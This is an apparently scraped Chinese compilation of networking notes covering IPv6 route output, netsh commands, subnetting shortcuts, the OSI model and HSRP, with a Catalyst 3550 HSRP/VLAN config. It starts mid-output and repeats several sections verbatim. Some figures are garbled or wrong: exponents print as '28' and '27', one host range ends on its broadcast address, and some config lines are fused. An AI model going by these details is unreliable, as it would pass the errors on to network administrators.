fe80::20a:42ff:feb0:5400 2 1004 fe80::5efe:131.107.17.19/128 fe80::5efe:131.107.17.19 2 1004 fe80::5efe:192.168.21.211/128 fe80::5efe:192.168.21.211 4 1008 ff00::/8 On-link 4 1004 fe80::713e:a426:d167:37ab/128 fe80::713e:a426:d167:37ab 1 1004 ::1/128 ::1 1 1008 ff00::/8 On-link 1 1004 fe80::1/128 fe80::1 =========================================================================== Persistent Routes:None
上述显示信息的第一部分列出了各个 IPv6 接口及其接口索引。第二部分列出了各个路由,这些路由可分类如下:
•前缀长度为 128 位 (/128) 的路由为特定 IPv6 目标的主路由。默认情况下,只有本地配置的 IPv6 地址的主路由位于 IPv6 路由表中。
•前缀长度为 64 位 (/64) 的路由为本地附加子网的子网路由。
•::/0 路由为默认路由。
•ff00::/8 为多播流量的路由。
有关 IPv6 路由表和 IPv6 路由确定过程的详细信息,请参阅“认识 IPv6 路由表”。
Netsh.exe 工具提供的 IPv6 配置信息
还可以通过在 netsh 工具的 netsh interface ipv6 上下文中,使用以下命令获取 IPv6 配置信息:
•netsh interface ipv6 show address
•netsh interface ipv6 show interface
•netsh interface ipv6 show routes
有关 Netsh 工具的详细信息,请参阅“通过 Netsh 管理 Windows 2000 网络组件”。
Netsh interface ipv6 show address 命令
Netsh interface ipv6 show address 命令可显示分配给每个接口的 IPv6 地址、地址的类型、重复地址检测 (DAD) 状态(首选或已否决)以及有效和首选的生命期。下面为 netsh interface ipv6 show address 命令在运行 Windows Vista 的计算机上,所显示的信息示例:
Interface 1:Loopback Pseudo-Interface 1 Addr Type DAD State Valid Life Pref. Life Address --------- ----------- ---------- ---------- ------------------------ Other Preferred infinite infinite ::1 Interface 9:Local Area Connection* 6 Addr Type DAD State Valid Life Pref. Life Address --------- ----------- ---------- ---------- ------------------------ Other Deprecated infinite infinite fe80::5efe:1.0.0.127%9 Interface 6:Local Area Connection Addr Type DAD State Valid Life Pref. Life Address --------- ----------- ---------- ---------- ------------------------ Public Preferred 29d23h59m59s 6d23h59m59s 3ffe:ffff:21da:7:1f3e:9e51:2178:b9ob Temporary Preferred 5d19h59m25s 5d19h59m25s 3ffe:ffff:21da:7:a299:85ae:21da:59cc Other Preferred infinite infinite fe80::713e:a426:d167:37ab%6 Interface 10:Local Area Connection* 7 Addr Type DAD State Valid Life Pref. Life Address --------- ----------- ---------- ---------- ------------------------ Other Deprecated infinite infinite fe80::5efe:1.0.0.127%10
Netsh interface ipv6 show interface 命令
Netsh interface ipv6 show interface 命令可显示 IPv6 接口的列表,其中包括接口索引、接口跃点数、最大传输单位 (MTU)、状态和名称。下面为 netsh interface ipv6 show interface 命令在运行 Windows Vista 的计算机上,所显示的信息示例:
Idx Met MTU State Name --- --- --- -- ----------- ------------------- 1 50 4294967295 enabled Loopback Pseudo-Interface 1 9 50 1280 enabled Local Area Connection* 6 6 20 1500 enabled Local Area Connection 10 50 1280 enabled Local Area Connection* 7 7 10 1500 disabled Local Area Connection 2
Netsh interface ipv6 show routes 命令
Netsh interface ipv6 show routes 命令可显示 IPv6 路由表,并包含有关路由是否已发布(若计算机充当广告路由器)和路由类型的信息。下面为 netsh interface ipv6 show route 命令在运行 Windows Vista 的计算机上,所显示的信息示例:
Publish Type Met Prefix Idx Gateway/Interface Name ------- -------- --- ------------------------ --- ------------------- ----- No 0 0 ::/0 6 fe80::20a:42ff:feb0:5400 No Manual 1 ::1/128 1 Loopback Pseudo-Interface 1 No 0 0 3ffe:ffff:21da:7::/64 6 Local Area Connection No Manual 1 3ffe:ffff:21da:7:1f3e:9e51:2178:b9ob/128 6 Local Area Connection No Manual 1 3ffe:ffff:21da:7:a299:85ae:21da:59cc/128 6 Local Area Connection No Manual 1 fe80::/64 6 Local Area Connection No Manual 1 fe80::/64 10 Local Area Connection* 7 No Manual 1 fe80::/64 9 Local Area Connection* 6 No Manual 1 fe80::5efe:1.0.0.127/128 10 Local Area Connection* 7 No Manual 1 fe80::5efe:1.0.0.127/128 9 Local Area Connection* 6 No Manual 1 fe80::713e:a426:d167:37ab/128 6 Local Area Connection
划分子网的几个捷径
1.你所选择的子网掩码将会产生多少个子网?:2的x次方-2(x代表掩码位,即2进制为1的部分)
2.每个子网能有多少主机?: 2的y次方-2(y代表主机位,即2进制为0的部分) 3.有效子网是?:有效子网号=256-10进制的子网掩码(结果叫做block size或base number) 4.每个子网的广播地址是?:广播地址=下个子网号-1 5.每个子网的有效主机分别是?:忽略子网内全为0和全为1的地址剩下的就是有效主机地址.最后有效1个主机地址=下个子网号-2(即广播地址-1) 根据上述捷径划分子网的具体实例: C类地址例子:网络地址192.168.10.0;子网掩码255.255.255.192(/26) 1.子网数=2*2-2=2 2.主机数=2的6次方-2=62 3.有效子网?:block size=256-192=64;所以第一个子网为192.168.10.64,第二个为192.168.10.128 4.广播地址:下个子网-1.所以2个子网的广播地址分别是192.168.10.127和192.168.10.191 5.有效主机范围是:第一个子网的主机地址是192.168.10.65到192.168.10.126;第二个是192.168.10.129到 192.168.10.190 B类地址例子1:网络地址:172.16.0.0;子网掩码255.255.192.0(/18) 1.子网数=2*2-2=2 2.主机数=2的14次方-2=16382 3.有效子网?:block size=256-192=64;所以第一个子网为172.16.64.0,最后1个为172.16.128.0 4.广播地址:下个子网-1.所以2个子网的广播地址分别是172.16.127.255和172.16.191.255 5.有效主机范围是:第一个子网的主机地址是172.16.64.1到172.16.127.254;第二个是172.16.128.1到172.16.191.254 B类地址例子2:网络地址:172.16.0.0;子网掩码255.255.255.224(/27) 1.子网数=2的11次方-2=2046(因为B类地址默认掩码是255.255.0.0,所以网络位为8+3=11) 2.主机数=2的5次方-2=30 3.有效子网?:block size=256-224=32;所以第一个子网为172.16.0.32 最后1个为172.16.255.192 4.广播地址:下个子网-1.所以第一个子网和最后1个子网的广播地址分别是172.16.0.63和172.16.255.223 5.有效主机范围是:第一个子网的主机地址是172.16.0.33到172.16.0.62;最后1个是172.16.255.193到 172.16.255.223 Variable Length Subnet Masks(VLSM) 变长子网掩码(VLSM)的作用:节约IP地址空间;减少路由表大小.使用VLSM时,所采用的路由协议必须能够支持它,这些路由协议包括RIPv2,OSPF,EIGRP和BGP
掩码的计算同主机块的计算
业务的发展常常会导致许多单位面临这样一个问题:工作站数量越来越多,管理单一的大型网络也变得越来越艰难。如果将一个单一的大型网络划分为多个子网,通过对每个子网进行单独管理,可以明显地提高整个网络的性能。 ---- 要划分子网就需要计算子网掩码和分配相应的主机块,尽管采用二进制计算可以得出相应的结论,但如果采用十进制计算方法,计算起来更为简便。经过长期实践与经验积累,笔者总结出子网掩码及主机块的十进制算法。 一、明确概念 ---- 在介绍十进制算法前我们先要明确一些概念。 类范围:IP地址常采用点分十进制表示方法X.Y.Y.Y,在这里,X在1~126范围内称为A类地址;X在128~191范围内称为B类地址;X在192~223范围内称为C类地址。比如10.202.52.130,因为X为10,在1~126范围内,所以称为A类地址。 类默认子网掩码:A类为 255.0.0.0; B类为 255.255.0.0; C类为 255.255.255.0。当我们要划分子网用到子网掩码M时,类子网掩码的格式如下:A类为 255.M.0.0,B类为 255.255.M.0,C类为 255.255.255.M。M是相应的子网掩码,比如255.255.255.240。 十进制计算基数是256(下面,我们所有的十进制计算都要用256来进行)。 二、变量说明 1.Subnet_block指可分配子网块大小,表示在某一子网掩码下子网的块数。 2.Subnet_num是可分配子网数,指可分配子网块中要剔除首、尾两块,是某一子网掩码下可分配的实际子网数量。Subnet_num =Subnet_block-2。 3.IP_block指每个子网可分配的IP地址块大小。 4.IP_num指每个子网实际可分配的IP地址数。因为每个子网的首、尾IP地址必须保留(一个为网络地址,一个为广播地址),所以它等于IP_block-2,IP_num也用于计算主机块。 5.M指子网掩码。 表示上述变量关系的公式如下: M=256-IP_block IP_block=256/Subnet_block或Subnet_block=256/IP_block IP_num=IP_block-2 Subnet_num=Subnet_block-2。 6.2的幂数。大家要熟练掌握28(256)以内的2的幂代表的十进制数(如128=27、64=26等),这样可以使我们立即推算出Subnet_block和IP_block的数目。 三、举例说明 现在,通过举一些实际例子,大家可以对子网掩码和主机块的十进制算法有深刻的了解。 1.已知所需子网数12,求实际子网数。 这里实际子网数指Subnet_num,由于12最接近2的幂为16(24),即Subnet_block=16,那么Subnet_num=16-2=14,故实际子网数为14。 2.已知一个B类子网的每个子网主机数要达到60×255个(约相当于X.Y.0.1~X.Y.59.254的数量),求子网掩码。 首先,60接近2的幂为64(26),即IP_block=64; 其次,子网掩码M=256-IP_block=256-64=192,最后由子网掩码格式B类是255.255.M.0得出子网掩码为255.255.192.0。 3.如果所需子网数为7,求子网掩码。 7最接近2的幂为8,但8个Subnet_block因为要保留首、尾2个子网块,即 8-2=6< 7,并不能达到所需子网数,所以应取2的幂为16,即Subnet_block=16。因为IP_block=256/Subnet_block=256/16=16,所以子网掩码M=256-IP_block=256-16=240。 4.已知网络地址为211.134.12.0,要有4个子网,求子网掩码及主机块。 由于211.Y.Y.Y是一个C类网,子网掩码格式为255.255.255.M,又知有4个子网,4接近2的幂是8(23),所以Subnet_block=8,Subnet_num=8-2=6,IP_block=256/Subnet_block=256/8=32,子网掩码M=256-IP_block=256-32=224,故子网掩码表示为255.255.255.224。又因为子网块的首、尾两块不能使用,所以可分配6个子网,每个子网有32个可分配主机块,即32~63、64~95、96~127、128~159、160~191、192~223,其中首块(0~31)和尾块(224~255)不能使用。 由于每个子网块中的可分配主机块又有首、尾两个不能使用(一个是子网网络地址,一个是子网广播地址),所以主机块分别为33~62、65~94、97~126、129~158、161~190及193~222,因此子网掩码为255.255.255.224,主机块共有6段,分别为211.134.12.33~211.134.12.62、211.134.12.65~211.134.12.94、211.134.12.97~211.134.12.126、211.134.12.129~211.134.12.158、211.134.12.161~211.134.12.190及211.134.12.193~211.134.12.222。用户可以任选其中的4段作为4个子网。 总之,只要理解了公式中的逻辑关系,就能很快计算出子网掩码,并得出可分配的主机块。
2.每个子网能有多少主机?: 2的y次方-2(y代表主机位,即2进制为0的部分) 3.有效子网是?:有效子网号=256-10进制的子网掩码(结果叫做block size或base number) 4.每个子网的广播地址是?:广播地址=下个子网号-1 5.每个子网的有效主机分别是?:忽略子网内全为0和全为1的地址剩下的就是有效主机地址.最后有效1个主机地址=下个子网号-2(即广播地址-1) 根据上述捷径划分子网的具体实例: C类地址例子:网络地址192.168.10.0;子网掩码255.255.255.192(/26) 1.子网数=2*2-2=2 2.主机数=2的6次方-2=62 3.有效子网?:block size=256-192=64;所以第一个子网为192.168.10.64,第二个为192.168.10.128 4.广播地址:下个子网-1.所以2个子网的广播地址分别是192.168.10.127和192.168.10.191 5.有效主机范围是:第一个子网的主机地址是192.168.10.65到192.168.10.126;第二个是192.168.10.129到 192.168.10.190 B类地址例子1:网络地址:172.16.0.0;子网掩码255.255.192.0(/18) 1.子网数=2*2-2=2 2.主机数=2的14次方-2=16382 3.有效子网?:block size=256-192=64;所以第一个子网为172.16.64.0,最后1个为172.16.128.0 4.广播地址:下个子网-1.所以2个子网的广播地址分别是172.16.127.255和172.16.191.255 5.有效主机范围是:第一个子网的主机地址是172.16.64.1到172.16.127.254;第二个是172.16.128.1到172.16.191.254 B类地址例子2:网络地址:172.16.0.0;子网掩码255.255.255.224(/27) 1.子网数=2的11次方-2=2046(因为B类地址默认掩码是255.255.0.0,所以网络位为8+3=11) 2.主机数=2的5次方-2=30 3.有效子网?:block size=256-224=32;所以第一个子网为172.16.0.32 最后1个为172.16.255.192 4.广播地址:下个子网-1.所以第一个子网和最后1个子网的广播地址分别是172.16.0.63和172.16.255.223 5.有效主机范围是:第一个子网的主机地址是172.16.0.33到172.16.0.62;最后1个是172.16.255.193到 172.16.255.223 Variable Length Subnet Masks(VLSM) 变长子网掩码(VLSM)的作用:节约IP地址空间;减少路由表大小.使用VLSM时,所采用的路由协议必须能够支持它,这些路由协议包括RIPv2,OSPF,EIGRP和BGP
掩码的计算同主机块的计算
业务的发展常常会导致许多单位面临这样一个问题:工作站数量越来越多,管理单一的大型网络也变得越来越艰难。如果将一个单一的大型网络划分为多个子网,通过对每个子网进行单独管理,可以明显地提高整个网络的性能。 ---- 要划分子网就需要计算子网掩码和分配相应的主机块,尽管采用二进制计算可以得出相应的结论,但如果采用十进制计算方法,计算起来更为简便。经过长期实践与经验积累,笔者总结出子网掩码及主机块的十进制算法。 一、明确概念 ---- 在介绍十进制算法前我们先要明确一些概念。 类范围:IP地址常采用点分十进制表示方法X.Y.Y.Y,在这里,X在1~126范围内称为A类地址;X在128~191范围内称为B类地址;X在192~223范围内称为C类地址。比如10.202.52.130,因为X为10,在1~126范围内,所以称为A类地址。 类默认子网掩码:A类为 255.0.0.0; B类为 255.255.0.0; C类为 255.255.255.0。当我们要划分子网用到子网掩码M时,类子网掩码的格式如下:A类为 255.M.0.0,B类为 255.255.M.0,C类为 255.255.255.M。M是相应的子网掩码,比如255.255.255.240。 十进制计算基数是256(下面,我们所有的十进制计算都要用256来进行)。 二、变量说明 1.Subnet_block指可分配子网块大小,表示在某一子网掩码下子网的块数。 2.Subnet_num是可分配子网数,指可分配子网块中要剔除首、尾两块,是某一子网掩码下可分配的实际子网数量。Subnet_num =Subnet_block-2。 3.IP_block指每个子网可分配的IP地址块大小。 4.IP_num指每个子网实际可分配的IP地址数。因为每个子网的首、尾IP地址必须保留(一个为网络地址,一个为广播地址),所以它等于IP_block-2,IP_num也用于计算主机块。 5.M指子网掩码。 表示上述变量关系的公式如下: M=256-IP_block IP_block=256/Subnet_block或Subnet_block=256/IP_block IP_num=IP_block-2 Subnet_num=Subnet_block-2。 6.2的幂数。大家要熟练掌握28(256)以内的2的幂代表的十进制数(如128=27、64=26等),这样可以使我们立即推算出Subnet_block和IP_block的数目。 三、举例说明 现在,通过举一些实际例子,大家可以对子网掩码和主机块的十进制算法有深刻的了解。 1.已知所需子网数12,求实际子网数。 这里实际子网数指Subnet_num,由于12最接近2的幂为16(24),即Subnet_block=16,那么Subnet_num=16-2=14,故实际子网数为14。 2.已知一个B类子网的每个子网主机数要达到60×255个(约相当于X.Y.0.1~X.Y.59.254的数量),求子网掩码。 首先,60接近2的幂为64(26),即IP_block=64; 其次,子网掩码M=256-IP_block=256-64=192,最后由子网掩码格式B类是255.255.M.0得出子网掩码为255.255.192.0。 3.如果所需子网数为7,求子网掩码。 7最接近2的幂为8,但8个Subnet_block因为要保留首、尾2个子网块,即 8-2=6< 7,并不能达到所需子网数,所以应取2的幂为16,即Subnet_block=16。因为IP_block=256/Subnet_block=256/16=16,所以子网掩码M=256-IP_block=256-16=240。 4.已知网络地址为211.134.12.0,要有4个子网,求子网掩码及主机块。 由于211.Y.Y.Y是一个C类网,子网掩码格式为255.255.255.M,又知有4个子网,4接近2的幂是8(23),所以Subnet_block=8,Subnet_num=8-2=6,IP_block=256/Subnet_block=256/8=32,子网掩码M=256-IP_block=256-32=224,故子网掩码表示为255.255.255.224。又因为子网块的首、尾两块不能使用,所以可分配6个子网,每个子网有32个可分配主机块,即32~63、64~95、96~127、128~159、160~191、192~223,其中首块(0~31)和尾块(224~255)不能使用。 由于每个子网块中的可分配主机块又有首、尾两个不能使用(一个是子网网络地址,一个是子网广播地址),所以主机块分别为33~62、65~94、97~126、129~158、161~190及193~222,因此子网掩码为255.255.255.224,主机块共有6段,分别为211.134.12.33~211.134.12.62、211.134.12.65~211.134.12.94、211.134.12.97~211.134.12.126、211.134.12.129~211.134.12.158、211.134.12.161~211.134.12.190及211.134.12.193~211.134.12.222。用户可以任选其中的4段作为4个子网。 总之,只要理解了公式中的逻辑关系,就能很快计算出子网掩码,并得出可分配的主机块。
子网掩码快速算法
很多人肯定对设定子网掩码这个不熟悉,很头疼,那么我现在就告诉大家一个很容易算子网掩码的方法,帮助一下喜欢偷懒的人:)
大家都应该知道2的0次方到10次方是多少把?也给大家说一下,分别是:
1 2 4 8 16 32 64 128 256 512 1024。
如果你希望每个子网中只有5个ip地址可以给机器用,那么你就最少需要准备给每个子网7个ip地址,因为需要加上两头的不可用的网络和广播ip,所以你需要选比7多的最近的那位,也就是8,就是说选每个子网8个ip。好,到这一步,你就可以算掩码了,这个方法就是:最后一位掩码就是256减去你每个子网所需要的ip地址的数量,那么这个例子就是256-8=248,那么算出这个,你就可以知道那些ip是不能用的了,看:0-7,8-15,16-23,24-31依此类推,写在上面的0、7、8、15、16、23、24、31(依此类推)都是不能用的,你应该用某两个数字之间的IP,那个就是一个子网可用的IP,怎么了?是不是不相信?太简单了。。。
我再试验一下,就拿200台机器分成4个子网来做例子吧。
200台机器,4个子网,那么就是每个子网50台机器,设定为192.168.10.0,C类的IP,大子网掩码应为255.255.255.0,对巴,但是我们要分子网,所以按照上面的,我们用32个IP一个子网内不够,应该每个子网用64个IP(其中 62位可用,足够了吧),然后用我的办法:子网掩码应该是256-64=192,那么总的子网掩码应该为:255.255.255.192。不相信?算算:0-63,64-127,128-191,192-255,这样你就可以把四个区域分别设定到四个子网的机器上了,是不是很简单?不需要软件算了吧。。。
大家都应该知道2的0次方到10次方是多少把?也给大家说一下,分别是:
1 2 4 8 16 32 64 128 256 512 1024。
如果你希望每个子网中只有5个ip地址可以给机器用,那么你就最少需要准备给每个子网7个ip地址,因为需要加上两头的不可用的网络和广播ip,所以你需要选比7多的最近的那位,也就是8,就是说选每个子网8个ip。好,到这一步,你就可以算掩码了,这个方法就是:最后一位掩码就是256减去你每个子网所需要的ip地址的数量,那么这个例子就是256-8=248,那么算出这个,你就可以知道那些ip是不能用的了,看:0-7,8-15,16-23,24-31依此类推,写在上面的0、7、8、15、16、23、24、31(依此类推)都是不能用的,你应该用某两个数字之间的IP,那个就是一个子网可用的IP,怎么了?是不是不相信?太简单了。。。
我再试验一下,就拿200台机器分成4个子网来做例子吧。
200台机器,4个子网,那么就是每个子网50台机器,设定为192.168.10.0,C类的IP,大子网掩码应为255.255.255.0,对巴,但是我们要分子网,所以按照上面的,我们用32个IP一个子网内不够,应该每个子网用64个IP(其中 62位可用,足够了吧),然后用我的办法:子网掩码应该是256-64=192,那么总的子网掩码应该为:255.255.255.192。不相信?算算:0-63,64-127,128-191,192-255,这样你就可以把四个区域分别设定到四个子网的机器上了,是不是很简单?不需要软件算了吧。。。
OSI参考模型
在计算机网络产生之初,每个计算机厂商都有一套自己的网络体系结构的概念,它们之间互不相容。为此,国际标准化组织(ISO)在1979年建立了一个分委员会来专门研究一种用于开放系统互联的体系结构(Open Systems Interconnection)简称OSI,"开放"这个词表示:只要遵循OSI标准,一个系统可以和位于世界上任何地方的、也遵循OSI标准的其他任何系统进行连接。这个分委员提出了开放系统互联,即OSI参考模型,它定义了连接异种计算机的标准框架。 OSI参考模型分为7层,分别是物理层,数据链路层,网络层,传输层,会话层,表示层和应用层。 各层的主要功能及其相应的数据单位如下:
· 物 理 层(Physical Layer) 我们知道,要传递信息就要利用一些物理媒体,如双纽线、同轴电缆等,但具体的物理媒体并不在OSI的7层之内,有人把物理媒体当作第0层,物理层的任务就是为它的上一层提供一个物理连接,以及它们的机械、电气、功能和过程特性。 如规定使用电缆和接头 的类型,传送信号的电压等。在这一层,数据还没有被组织,仅作为原始的位流或电气电压处理,单位是比特。
· 数 据 链 路 层(Data Link Layer) 数据链路层负责在两个相邻结点间的线路上,无差错的传送以帧为单位的数据。每一帧包括一定数量的数据和一些必要的控制信息。和物理层相似,数据链路层要负责建立、维持和释放数据链路的连接。在传送数据时,如果接收点检测到所传数据中有差错,就要通知发方重发这一帧。
· 网 络 层(Network Layer) 在计算机网络中进行通信的两个计算机之间可能会经过很多个数据链路,也可能还要经过很多通信子网。网络层的任务就是选择合适的网间路由和交换结点, 确保数据及时传送。网络层将数据链路层提供的帧组成数据包,包中封装有网络层包头,其中含有逻辑地址信息- -源站点和目的站点地址的网络地址。
· 传 输 层(Transport Layer) 该层的任务时根据通信子网的特性最佳的利用网络资源,并以可靠和经济的方式,为两个端系统(也就是源站和目的站)的会话层之间,提供建立、维护和取消传输连接的功能,负责可靠地传输数据。在这一层,信息的传送单位是报文。
· 会 话 层(Session Layer) 这一层也可以称为会晤层或对话层,在会话层及以上的高层次中,数据传送的单位不再另外命名,统称为报文。会话层不参与具体的传输,它提供包括访问验证和会话管理在内的建立和维护应用之间通信的机制。如服务器验证用户登录便是由会话层完成的。
· 表 示 层(Presentation Layer) 这一层主要解决拥护信息的语法表示问题。它将欲交换的数据从适合于某一用户的抽象语法,转换为适合于OSI系统内部使用的传送语法。即提供格式化的表示和转换数据服务。数据的压缩和解压缩, 加密和解密等工作都由表示层负责。
· 应 用 层(Application Layer) 应用层确定进程之间通信的性质以满足用户需要以及提供网络与用户应用软件之间的接口服务。
· 物 理 层(Physical Layer) 我们知道,要传递信息就要利用一些物理媒体,如双纽线、同轴电缆等,但具体的物理媒体并不在OSI的7层之内,有人把物理媒体当作第0层,物理层的任务就是为它的上一层提供一个物理连接,以及它们的机械、电气、功能和过程特性。 如规定使用电缆和接头 的类型,传送信号的电压等。在这一层,数据还没有被组织,仅作为原始的位流或电气电压处理,单位是比特。
· 数 据 链 路 层(Data Link Layer) 数据链路层负责在两个相邻结点间的线路上,无差错的传送以帧为单位的数据。每一帧包括一定数量的数据和一些必要的控制信息。和物理层相似,数据链路层要负责建立、维持和释放数据链路的连接。在传送数据时,如果接收点检测到所传数据中有差错,就要通知发方重发这一帧。
· 网 络 层(Network Layer) 在计算机网络中进行通信的两个计算机之间可能会经过很多个数据链路,也可能还要经过很多通信子网。网络层的任务就是选择合适的网间路由和交换结点, 确保数据及时传送。网络层将数据链路层提供的帧组成数据包,包中封装有网络层包头,其中含有逻辑地址信息- -源站点和目的站点地址的网络地址。
· 传 输 层(Transport Layer) 该层的任务时根据通信子网的特性最佳的利用网络资源,并以可靠和经济的方式,为两个端系统(也就是源站和目的站)的会话层之间,提供建立、维护和取消传输连接的功能,负责可靠地传输数据。在这一层,信息的传送单位是报文。
· 会 话 层(Session Layer) 这一层也可以称为会晤层或对话层,在会话层及以上的高层次中,数据传送的单位不再另外命名,统称为报文。会话层不参与具体的传输,它提供包括访问验证和会话管理在内的建立和维护应用之间通信的机制。如服务器验证用户登录便是由会话层完成的。
· 表 示 层(Presentation Layer) 这一层主要解决拥护信息的语法表示问题。它将欲交换的数据从适合于某一用户的抽象语法,转换为适合于OSI系统内部使用的传送语法。即提供格式化的表示和转换数据服务。数据的压缩和解压缩, 加密和解密等工作都由表示层负责。
· 应 用 层(Application Layer) 应用层确定进程之间通信的性质以满足用户需要以及提供网络与用户应用软件之间的接口服务。
HSRP介绍
所谓的热备份路由协议(HSRP)主要是向我们提供了这样一种机制,它的设计目的主要在于支持IP传输失败情况下的不中断服务。具体说,就是本协议用于在源主机无法动态地学习到首跳路由器IP地址的情况下防止首跳路由的失败。它主要用于多接入,多播和广播局域网(例如以太网)。 当然HSRP并不是有意要取代现有的动态路由发现机制,而这些现有的路由协议仍可以继续使用只不过不是在任何可能的情况下。以前的大部分主机都不支持动态路由发现协议,他们是通过配置缺省路由来进行工作的。而HSRP却为它们提供了一种失败服务机制在HSRP中所涉及到的所有路由器都被假设为已经配好了合适的IP路由协议,并且也已经存在了若干条路由。 热备份路由协议(HSRP)的目的在于使主机看上去只使用了一个路由器,并且即使在它当前所使用的首跳路由器失败的情况下仍能够保持路由的连通性。此协议中所涉及到的多路由器都映射为一个虚拟的路由器。本协议保证同时有且只有一个路由器在代表虚拟路由器进行包的发送。而终端则是把数据包发向该虚拟路由器。这个转发包的路由器被成为活路由器。如果这个活路由器在某个时候由于某种原因而无法工作的话,则那个备份的路由器将被选择来代替原来的活路由器。本协议为活路由器和备份路由器的定义提供了一种机制。在协议所设计到的路由器上使用IP地址,如果这个活路由器失效的话则那个备份路由器马上代替活路由器工作而不会在对主机的连通性上产生大的中断。 在使用HSRP时,一组路由器的工作将一致的表现为局域网上通往主机的一个虚拟路由器的工作。这组路由器就称为一个 HSRP组,或备份组。这个组中将选出一个路由器来负责转发由主机发给虚拟路由器的数据包。这个路由器就是所谓的活路由器。另一台路由器将被选为备份路由器。在活路由器失效的情况下,备份路由器将承担活路由器的包的转发功能。即使你可以任意制定运行HSRP的路由器的数量,但只有活路由器才能转发发送给虚拟路由器的数据包。 为了把网络阻塞降到最底限度,网络中只有活路由器和备份路由器可以在完成HSRP协议选择过程后发送一次HSRP消息包。如果活路由器失效,则备份路由器将取代它作为新的活路由器工作。而当备份路由器失效或者它变成了活路由器时,另外一个路由器将被选为备份路由器。在某个局域网里,多个热备组可以共存和重叠。每个备份组都仿效一个虚拟路由器。对于每个备份组来说都有一个为别人所知的MAC地址,以及一个IP地址。而这个IP地址应该是这个局域网中第一个子网中的地址,但必须不同于设置在所有路由器端口上的地址和局域网中主机的地址,甚至包括为其他HSRP组设的地址。 如果在一个局域网中设置了多个HSRP组,那么分配主机给不同的备份组就会使网络产生负载爆炸。
Catalyst 3550三层路由和HSRP经典配置
vlan200和vlan201为2台交换机互连的vlan
ip subnet-zero
ip routing
no ip domain-lookup
spanning-tree mode pvst
spanning-tree extend system-id
spanning-tree vlan 200 priority 24576
spanning-tree vlan 201 priority 24576
spanning-tree vlan 202 priority 28672
spanning-tree vlan 203 priority 28672
spanning-tree vlan 204 priority 24576
spanning-tree vlan 205 priority 24576
spanning-tree vlan 206priority 28672
spanning-tree vlan 307 priority 24576
spanning-tree vlan 308 priority 24576
interface Port-channel1
switchport trunk encapsulation dot1q
switchport mode trunk
no ip address
!
interface FastEthernet0/1
switchport access vlan 200
switchport mode access
no ip address
duplex full
speed 100
!
interface FastEthernet0/2
switchport access vlan 201
switchport mode access
no ip address
duplex full
speed 100
!
interface FastEthernet0/3
switchport access vlan 202
no ip address
!
interface FastEthernet0/4
no ip address
!
interface FastEthernet0/5
no ip address
!
interface FastEthernet0/6
switchport access vlan 203
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/7
switchport access vlan 203
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/8
switchport access vlan 203
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/9
switchport access vlan 203
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/10
switchport access vlan 203
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/11
switchport access vlan 204
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/12
switchport access vlan 204
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/13
switchport access vlan 204
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/14
switchport access vlan 205
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/15
switchport access vlan 205
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/16
switchport access vlan 206
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/17
switchport access vlan 206
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/18
switchport access vlan 206
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/19
switchport access vlan 207
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/
20
switchport access vlan 207
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/21
switchport access vlan 208
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/22
switchport access vlan 208
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/29
switchport access vlan 208
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/30
switchport access vlan 208
switchport mode access
no ip address
spanning-tree portfast
。。。。。。。。。。。。。。。。。。
。。。。。。。。。。。。。。。。。。
!
interface GigabitEthernet0/1
switchport trunk encapsulation dot1q
switchport mode trunk
no ip address
channel-group 1 mode on
!
interface GigabitEthernet0/2
switchport trunk encapsulation dot1q
switchport mode trunk
no ip address
channel-group 1 mode on
!
interface Vlan1
ip address xxxxxxxxx
no ip redirects
standby 1 ip xxxxxxx
standby 1 priority 120
standby 1 preempt
!
interface Vlan200
ip address xxxxxxxxx
!
interface Vlan201
ip address xxxxxxxxx
!
interface Vlan202
ip address xxxxxxxxx
no ip redirects
standby 202 ip xxxxxxxxx
standby 202priority 120
standby 202 preempt
!
interface Vlan203
ip address xxxxxxxxx
no ip redirects
standby 203 ip xxxxxxxxx
standby 203priority 120
standby 203 preempt
!
interface Vlan204
ip address xxxxxxxxx
no ip redirects
standby 204 ip xxxxxxxxx
standby 204priority 120
standby 204 preempt
!
interface Vlan205
ip address xxxxxxxxx
no ip redirects
standby 205 ip xxxxxxxxx
standby 205priority 120
standby 205 preempt
router eigrp
network xxxxxxx
no auto-summary
ip classless
end
ip subnet-zero
ip routing
no ip domain-lookup
spanning-tree mode pvst
spanning-tree extend system-id
spanning-tree vlan 200 priority 24576
spanning-tree vlan 201 priority 24576
spanning-tree vlan 202 priority 28672
spanning-tree vlan 203 priority 28672
spanning-tree vlan 204 priority 24576
spanning-tree vlan 205 priority 24576
spanning-tree vlan 206priority 28672
spanning-tree vlan 307 priority 24576
spanning-tree vlan 308 priority 24576
interface Port-channel1
switchport trunk encapsulation dot1q
switchport mode trunk
no ip address
!
interface FastEthernet0/1
switchport access vlan 200
switchport mode access
no ip address
duplex full
speed 100
!
interface FastEthernet0/2
switchport access vlan 201
switchport mode access
no ip address
duplex full
speed 100
!
interface FastEthernet0/3
switchport access vlan 202
no ip address
!
interface FastEthernet0/4
no ip address
!
interface FastEthernet0/5
no ip address
!
interface FastEthernet0/6
switchport access vlan 203
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/7
switchport access vlan 203
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/8
switchport access vlan 203
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/9
switchport access vlan 203
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/10
switchport access vlan 203
switchport mode access
no ip address
spanning-tree portfast
!
